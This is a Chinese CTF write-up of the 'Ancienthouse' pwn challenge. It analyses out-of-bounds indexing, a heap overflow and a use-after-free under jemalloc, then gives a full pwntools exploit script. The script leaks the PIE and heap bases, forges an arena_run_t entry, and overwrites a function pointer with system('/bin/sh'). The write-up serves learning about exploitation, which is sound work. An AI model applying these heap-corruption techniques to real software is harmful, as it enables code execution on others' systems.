Jemalloc+UAF+堆溢出

Ancienthouse 复现

这个程序有点特殊，它没有使用 ptmalloc，而是使用了 jemalloc：

➜  pwn_Ancient_House ldd Ancienthouse
	linux-vdso.so.1 (0x00007fffa5fcc000)
	./libjemalloc.so (0x00007faeaa826000)
	libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007faeaa61f000)
	libpthread.so.0 => /lib/x86_64-linux-gnu/libpthread.so.0 (0x00007faeaa5fc000)
	libdl.so.2 => /lib/x86_64-linux-gnu/libdl.so.2 (0x00007faeaa5f6000)
	/lib64/ld-linux-x86-64.so.2 (0x00007faeaa85e000)

其他信息：

➜  pwn_Ancient_House file Ancienthouse
Ancienthouse: ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=c89baa4d5cf70d4da6d034cde16c86e4870f2e08, for GNU/Linux 3.2.0, stripped
➜  pwn_Ancient_House checksec Ancienthouse              
[*] '/home/yhellow/\xe6\xa1\x8c\xe9\x9d\xa2/pwn_Ancient_House/Ancienthouse'
    Arch:     amd64-64-little
    RELRO:    Full RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      PIE enabled

64位，dynamically，全开

➜  pwn_Ancient_House ./Ancienthouse
Who dares to enter these hallowed halls!! : 0
    _                  _               _     _   _                          
   / \    _ __    ___ (_)  ___  _ __  | |_  | | | |  ___   _   _  ___   ___ 
  / _ \  | '_ \  / __|| | / _ \| '_ \ | __| | |_| | / _ \ | | | |/ __| / _ \
 / ___ \ | | | || (__ | ||  __/| | | || |_  |  _  || (_) || |_| |\__ \|  __/
/_/   \_\|_| |_| \___||_| \___||_| |_| \__| |_| |_| \___/  \__,_||___/ \___|
                                                                            

============== MENU ==============
| 1. Add Enemy                   |
| 2. Battle                      |
| 3. Merge                       |
| 4. Enter any other key to flee |
==================================
>>

大致说明一下程序的逻辑：

有点类似于一种 “蚂蚁大战” 的游戏，程序中利用如下结构体来描述一个 “蚂蚁群落”：

00000000 Chunk struc ; (sizeof=0x14, mappedto_8) ; XREF: .bss:chunk_list/r
00000000 name dq ?		/* 指向一片装有name的heap空间 */
00000008 num dd ?		/* 表示群落中蚂蚁的数目 */
0000000C index dd ?		/* 表示该Chunk在chunk_list中的索引 */
00000010 size dd ?		/* 表示name的长度 */
00000014 Chunk ends

Add Enemy：添加一个新的 “蚂蚁群落”，默认 chunk->num 为 “0x64”
Battle：使你的 “蚂蚁群落” 和目标 “蚂蚁群落” 打架，使目标 chunk->num 减少 “0xf”，如果 chunk->num 减少为 “0”，则可以选择 “杀死”（释放）它
Merge：选择两个 “蚂蚁群落”，使其合并为一个
Enter any other key to flee：执行一次函数指针，多半需要控制这里

漏洞分析

__int64 battle()
{
  int id; // [rsp+4h] [rbp-Ch] BYREF
  unsigned __int64 v2; // [rsp+8h] [rbp-8h]

  v2 = __readfsqword(0x28u);
  puts("Battle ");
  printf("Enter enemy id : ");
  __isoc99_scanf("%d", &id);
  battle_s(id);
  return 0LL;
}

在 battle 中输入的 id 没有进行检查，造成了数组越位

if ( !chunk_list[index] )
{
  puts("There's no one here to battle ");
  return 0LL;
}
printf("Starting battle with %s ....\n", chunk_list[index]->name);
if ( chunk_list[index]->num > 0 )
  chunk_list[index]->num -= chunk_head->num;  // 0xF

只要 chunk_list[index] 不为空，就可用打印 chunk_list[index]->name 泄露数据
此外，还可以利用 chunk_list[index]->num -= chunk_head->num 修改 index_max

1	if ( index <= (unsigned int)index_max )

因为 index_max 是 unsigned int 类型，所以负数溢出后 index_max 会变得很大，突破了 add 的限制

chunk = chunk_list[index1];
chunk->name = (char *)realloc(chunk->name, size1 + size2);
chunk_list[index1]->size = size1 + size2;
chunk_list[index1]->num += chunk_list[index2]->num;
merge_name(chunk_list[index1]->name, chunk_list[index2]->name, size1 + size2);

前面已经把 chunk_list[index1]->size 改为了 size1 + size2
后面在执行 merge_name 时，依然使用 size1 + size2
size2 被加了两遍，造成了堆溢出

if ( choice == 1 )
{
  puts("killed");
  free(chunk_list[index]);
  free(chunk_list[index]->name);
  chunk_list[index] = 0LL;
  return 0LL;
}

释放时，置空了 chunk_list[index]，但是没有置空 chunk_list[index]->name
可以利用堆风水来泄露 chunk_list->name（leak heap_addr）

泄露 pro_base 的思路

pwndbg> x/20xg 0x558ae15df000
0x558ae15df000:	0x0000000000000000	0x0000558ae15df008 /* off_4008 */
0x558ae15df010:	0x00000000fffffff6	0x0000000000000000
0x558ae15df020 <stdout>:	0x00007f3a7b9ad6a0	0x0000000000000000
0x558ae15df030:	0x00007f3a7a806040	0x0000000000000001
0x558ae15df040:	0x00007f3a7a80a040	0x0000000000000000 /* chunk_list */

1 2	.data:0000000000004008 08 40 00 00 00 00 00 00 off_4008 dq offset off_4008 ; DATA XREF: sub_12A0+1B↑r .data:0000000000004010 05 00 00 00 index_max dd 5 ; DATA XREF: add+24↑r

off_4008 中装的是它自己，它后面“0x8”字节就是 index_max
battle 可以减少 num，并且泄露 name，它们之间也相差“0x8”字节
所以使 index_max 负数溢出的同时，可以泄露 off_4008，绕过 PIE

1	battle(-7)

泄露 heap 的思路

在 add 中，程序会先 malloc(0x18) 申请一片空间给 “蚂蚁群落” 结构体 Chunk ，然后再申请 Chunk->name
如果 Chunk->name 和 Chunk 属于同一个 run（size大小在同一范围），就会分配到一起
利用堆风水，使 Chunk->name 分配到已经释放的 Chunk 上，由于释放的 Chunk 中 name 指针没有置空，所以新的 Chunk->name 可以泄露该指针

add(0x60, '1' * 0x20) 
add(0x60, '2' * 0x20) 

kill(0) # 需要释放两个Chunk,也就是4个region,两个0x60大小,两个0x20大小
kill(1) 
    
add(0x20, '') # 需要占用两个0x20大小的region,第二个就会作为Chunk->name
battle(2)

入侵思路

 p_fun = malloc(0x50uLL);
 *p_fun = str_fun;

.......

 ((void (__fastcall *)(_QWORD))*p_fun)(p_fun[1]);
 exit(1);

选择“4”会执行一次函数指针 p_fun，我们的目的就是覆盖它为 system（本程序是有 system 的）

对于 jemalloc-2.2.5 有一些特点：

malloc 分配的数据是连续的，jemalloc-2.2.5 用偏移来获取 region 的位置

1
2
3

/* jemalloc-2.2.5/src/arena.c */
ret = (void *)((uintptr_t)run + (uintptr_t)bin_info->reg0_offset +
    (uintptr_t)(bin_info->reg_size * regind));

region 的值可以理解为“3”部分相加：
- run：对应 run 的基地址
- bin_info->reg0_offset：此 bin 对应的 run 中第一个 region 的偏移量
- bin_info->reg_size * regind：目标 region 在 run 中的偏移量
在 jemalloc 分配 region 前，会在目标 run 的范围的头部申请一个 arena_run_t 结构体来管理 run
每一个 run 占用的地址空间有一定的规律：

add(0x10, '0' * 0x10)
add(0x20, '1' * 0x10)
add(0x30, '2' * 0x10)
add(0x40, '3' * 0x10)
add(0x50, '4' * 0x10)
add(0x60, '5' * 0x10)
add(0x70, '6' * 0x10)

pwndbg> telescope 0x55a84742a040
00:0000│  0x55a84742a040 —▸ 0x7f0d6300a040 —▸ 0x7f0d63006050 ◂— '0000000000000000'
01:0008│  0x55a84742a048 —▸ 0x7f0d6300a060 —▸ 0x7f0d6300a080 ◂— '1111111111111111'
02:0010│  0x55a84742a050 —▸ 0x7f0d6300a0a0 —▸ 0x7f0d6300b040 ◂— '2222222222222222'
03:0018│  0x55a84742a058 —▸ 0x7f0d6300a0c0 —▸ 0x7f0d63007080 ◂— '3333333333333333'
04:0020│  0x55a84742a060 —▸ 0x7f0d6300a0e0 —▸ 0x7f0d630080b0 ◂— '4444444444444444'
05:0028│  0x55a84742a068 —▸ 0x7f0d6300a100 —▸ 0x7f0d6300c080 ◂— '5555555555555555'
06:0030│  0x55a84742a070 —▸ 0x7f0d6300a120 —▸ 0x7f0d6300e080 ◂— '6666666666666666'
07:0038│  0x55a84742a078 ◂— 0x0

不管重复多少次后5位始终不变，说明 jemalloc 的分配以 100page 为单位
而 p_fun 是用 malloc(0x50) 分配的，它所在地址为“0x8000”

pwndbg> telescope 0x7f8a8c808000
00:0000│  0x7f8a8c808000 ◂— 0x384adf93 /* arena_run_t[0x50] */
01:0008│  0x7f8a8c808008 —▸ 0x7f8a8d000d70 ◂— 0x0
02:0010│  0x7f8a8c808010 ◂— 0x3000000002
03:0018│  0x7f8a8c808018 ◂— 0x3fffffffffffc
04:0020│  0x7f8a8c808020 ◂— 0x0
... ↓     3 skipped
08:0040│  0x7f8a8c808040 ◂— 0x0
... ↓     3 skipped
0c:0060│  0x7f8a8c808060 —▸ 0x563e3dadfb82 ◂— endbr64 /* p_fun */
0d:0068│  0x7f8a8c808068 ◂— 0x0
... ↓     2 skipped
10:0080│  0x7f8a8c808080 ◂— 0x0
... ↓     5 skipped
16:00b0│  0x7f8a8c8080b0 ◂— '4444444444444444'
17:00b8│  0x7f8a8c8080b8 ◂— '44444444'

因为 p_fun 是 run[0x50] 的第一个 region，申请的 region[0x50] 不可能向上覆盖，所以只能考虑申请 0x40 的 region（因为离得最近）
可以利用堆溢出来修改控制 arena_run_t[0x50] 结构体

typedef struct arena_run_s arena_run_t;

struct arena_run_s {
#ifdef JEMALLOC_DEBUG
	uint32_t	magic;
#  define ARENA_RUN_MAGIC 0x384adf93
#endif

	arena_bin_t	*bin; /* 与此run关联的bin */
	uint32_t	nextind; /* 下一个从未分配过的区域或nregs的索引 */
	unsigned	nfree; /* run中的空闲区域数 */
    
    /* 本次运行中区域的位掩码,每个位对应一个区域,'0'表示该区域已使用,'1'位值表示相应区域空闲,变量nextind是该数组的第一个非零元素的索引 */
    unsigned regs_mask[];
};

我们需要修改的就是这个 arena_run_s->nfree

pwndbg> p (arena_run_t)*0x7fc184808000
$1 = {
  magic = 944430995,
  bin = 0x7fc185000d70,
  nextind = 1,
  nfree = 49 
}

把 nfree 改为50，其他条目都不变
如果 nfree 为初始值，jemalloc 就会认为该 run 没有进行分配，下一次分配就会覆盖 p_fun（这里不是很清楚原因，可能要在源码中找依据）

堆溢出 merge 有3个条件：

if ( index1 == index2 || size1 != size2 || size1 + size2 > 0x5F )
{
  puts("Dont try anything funny ");
  exit(1);
}

index 不相同，size 相同，size1 + size2 > 0x5F
好像就只能使用两个 0x20 进行 merge 了

还有一个关键点：malloc 分配的数据是连续的

char *__fastcall merge_name(char *name1, char *name2, unsigned __int64 size)
{
  unsigned __int64 i; // [rsp+20h] [rbp-10h]
  size_t len; // [rsp+28h] [rbp-8h]

  len = strlen(name1);
  for ( i = 0LL; i < size; ++i )
    name1[i + len] = name2[i];
  name1[i + len] = 0;
  return name1;
}

“size”为“0x60”（size1+size2+size2）
name2 的后半部分必须是 fake arena_run_t[0x50]

堆风水的构建

首先，name 必须连续，用两个连续的 name 来充当 name2，这里我参考了学长的思路：

正常释放时，内存排列为：chunkF-nameF-chunkF-nameF-chunkF-nameF
使用 malloc(0x60) 打乱内存的排列：chunk-nameF-chunkF-nameF-chunkF-nameF
然后继续 malloc(0x20) 两次：chunk-chunk-name-chunk-name-nameF
原本 name 的位置被写入了 chunk，原本 chunk 的位置被写入了 name，最后的 name-nameF 满足了 name 连续的条件
所以，可以在最后一个 nameF 中装入 fake arena_run_t[0x50]

完整 exp：

from pwn import *

p = process("./Ancienthouse")
elf = ELF("./Ancienthouse")

def add(size,name):
	p.sendlineafter(">> ",str(1))
	p.sendlineafter("Enter the size : ",str(size))
	p.sendlineafter("Enter name : ",name)

def battle(id):
	p.sendlineafter(">> ",str(2))
	p.sendlineafter("Enter enemy id : ",str(id))

def merge(id1,id2):
	p.sendlineafter(">> ",str(3))
	p.sendlineafter("[+] Enemy id 1: ",str(id1))
	p.sendlineafter("[+] Enemy id 2: ",str(id2))

def kill(id):
	for i in range(7):
		battle(id)
	p.sendline(str(1))

def fun():
	p.sendlineafter(">> ",str(4))

p.sendline("yhellow")

#gdb.attach(p)

battle(-7)

p.recvuntil("Starting battle with ")
leak_addr = u64(p.recvuntil(" ....")[:-5].ljust(8,"\x00"))
pro_base = leak_addr-0x4008

success("leak_addr >> "+hex(leak_addr))
success("pro_base >> "+hex(pro_base))
success("chunk_list >> "+hex(pro_base+0x4040))

p.sendlineafter("You beat 'em!\n",str(2))

add(0x60, '1' * 0x20) # 0 
add(0x60, '2' * 0x20) # 1

kill(0)
kill(1)
add(0x20, '') # 2
battle(2)

p.recvuntil("Starting battle with ")
leak_addr = u64(p.recvuntil(" ....")[:-5].ljust(8,"\x00"))
heap_base = leak_addr - 0xb00a
success("leak_addr >> "+hex(leak_addr))
success("heap_base >> "+hex(heap_base))

for i in range(6):
	battle(2)

p.sendlineafter("You beat 'em!\n",str(1))

for i in range(61):
	add(0x40, 'a'*0x40) # 3-63

add(0x20, '/bin/sh\x00') # 64
binsh = heap_base + 0xa800 
payload = p64(0x384adf93)+p64(heap_base+0x800d70)+p64(0x0000003200000001)+p64(0x0003ffffffffffff)

add(0x20, '1' * 0x20) # 65 
add(0x20, payload) # 66 
add(0x20, '3' * 0x20) # 67
kill(65)
kill(66)
# chunkF-nameF-chunkF-nameF(t)

add(0x70, 'k' * 0x60) # 68
# (chunk)-nameF-chunkF-nameF(t)

add(0x20, '1' * 0x20) # 69 
# chunk-(chunk-name)-nameF(t)

merge(67, 69)

system = pro_base + 0x1170
paylaod = p64(system) + p64(binsh)
add(0x50, paylaod) # p_func

p.sendline(str(4))

p.interactive()

小结：

jemalloc 对于 small part 的分配已经比较清楚了，但有些细节没有对照源码来看，只是记了结论